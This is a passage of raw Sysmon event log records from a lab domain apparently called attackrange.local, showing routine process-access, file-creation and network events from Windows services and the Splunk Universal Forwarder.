Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005917793Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.733{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917792Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.733{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917791Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.395{896A638B-B40C-605B-8769-00000000AE01}34925264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917790Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.241{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B40C-605B-8769-00000000AE01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917789Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.239{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917788Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.239{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917787Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.239{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917786Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.239{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917785Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.239{896A638B-B5C8-6058-0500-00000000AE01}396512C:\Windows\system32\csrss.exe{896A638B-B40C-605B-8769-00000000AE01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917784Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.239{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B40C-605B-8769-00000000AE01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917783Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:04.230{896A638B-B40C-605B-8769-00000000AE01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005917807Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:05.907{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8266D2A6A59FD3D47F166F09E4080DA9,SHA256=68A3DC0A8E6B093660AD91EF79CA326A2D405088479C4EF7DED93EA30B3AB26D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638587Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:05.397{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79F63B5D95E63E7D9402F4643E3EBC9F,SHA256=FECFB6D63337C1B5C9D2D5E26AEFBF8228CD110B92CF345958DDD5786B4791F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917806Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:05.833{896A638B-B5CA-6058-1200-00000000AE01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=65B424A5CD27F4185B1862542897E058,SHA256=88EF93D18D73290E8723A41B7DEDC35C321B7A4D0695840E60951CD3B1BFB441,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917805Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:05.733{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917804Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:05.733{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917803Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:05.285{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27426699BCD376A6C8C2353F7E6A76FD,SHA256=1FDDBDC12A12BF82EDD3723CE2FB3E8B8C50A28A6D5D963A0F8EA69F3119AA4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917810Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:06.920{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F904B42809A835A3DD93CCDC3B98670,SHA256=897272D3BD97F060FF92FEE1F860ABF817E1136997CCA258FDBC306EC22B7BCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638589Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:06.413{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A280B83E98CAD87B08D91177E5E12069,SHA256=70650BB292D0F1950E15F328E725E313A834DF797886A2AD4C72848B8AC2E833,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917809Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:06.733{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917808Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:06.733{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638588Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:06.085{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66AA61AA67849658468467762ACAE777,SHA256=BCA34BF619A8519B7701A05794E51DD631193A764466A5619D32DFB9993C74B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917816Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:07.956{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=108802F0A6ED4AD282CB748D4FD79415,SHA256=50B0B7FCD78F8078CA3A28434FDCF78183A63F0F6E78FF514E9256FAF6696599,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638592Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:07.429{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2F5EA4702C806E8154826117EEAFBDD,SHA256=55778E7662E1639E02C0011D9E88F7E88C39FAC6F3F132C322C11D4003178119,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917815Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:07.734{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917814Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:07.734{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917813Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:07.356{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917812Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:07.356{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005917811Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:03.866{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1509-false10.0.1.12-8000- 23542300x8000000000000000638591Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:07.304{BFB545BB-B8FB-6058-A200-00000000AF01}3640NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=110595CEF9B4CBA210BA20B2379C084A,SHA256=7D73824D889500B0F5D9723AA57E5770140E65EEF42DCF932AD014F8B83C23F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638590Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.318{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57256-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000005917821Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:08.961{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFDE45475BC76CDC34482F66CEF4C760,SHA256=4D20871BFC7594128E60511939919BB58E126C20860E023E74C02931A4D06D45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638594Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:08.491{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31931063BC0EFFA150E55D1BCA7611FD,SHA256=E869642353EB2BD280AD984F8DFDE9CDF088B69D2692C44CECB19B3E78F2ABBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917820Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:08.734{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917819Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:08.734{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917818Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:08.727{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdl